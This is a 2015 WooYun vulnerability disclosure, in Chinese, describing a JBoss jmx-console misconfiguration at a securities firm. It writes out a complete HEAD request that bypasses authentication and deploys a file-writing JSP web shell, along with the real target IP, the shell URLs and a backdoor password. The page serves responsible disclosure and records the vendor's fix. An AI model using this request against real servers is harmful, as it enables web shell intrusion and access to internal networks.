当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146202

漏洞标题:浙商证券某系统配置不当导致getshell可威胁内网

相关厂商:浙商证券股份有限公司

漏洞作者: 茜茜公主

提交时间:2015-10-12 17:47

修复时间:2015-11-27 10:30

公开时间:2015-11-27 10:30

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-13: 厂商已经确认,细节仅向厂商公开
2015-10-23: 细节向核心白帽子及相关领域专家公开
2015-11-02: 细节向普通白帽子公开
2015-11-12: 细节向实习白帽子公开
2015-11-27: 细节向公众公开

简要描述:

配置不当导致getshell可威胁内网

详细说明:

QQ截图20151012150338.jpg


地址:http://122.224.251.229/
该系统使用了jboss作为中间件

QQ截图20151012160600.jpg


虽然存在认证,但可以通过head绕过认证上传shell

HEAD http://122.224.251.229/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=wooyun.war&argType=java.lang.String&&arg1=she11&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: 122.224.251.229
Connection: Keep-Alive
Cookie: JSESSIONID=B26A6D2E71CBF995A30762B59B080B6D.node1


QQ截图20151012161410.jpg


小马地址:http://122.224.251.229/wooyun/she11.jsp

QQ截图20151012161453.jpg

漏洞证明:

通过小马上传一句话

QQ截图20151012161612.jpg


一句话地址:http://122.224.251.229/wooyun/woo.jsp
密码:023

QQ截图20151012161740.jpg


QQ截图20151012161813.jpg


QQ截图20151012161857.jpg


可内网

QQ截图20151012162125.jpg

修复方案:

删除jmx-console

版权声明:转载请注明来源 茜茜公主@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2015-10-13 10:29

厂商回复:

已确认该漏洞,已临时下线该系统,进行修复后再上线。

最新状态:

2015-11-23:该系统已确认下线,感谢对浙商证券的支持!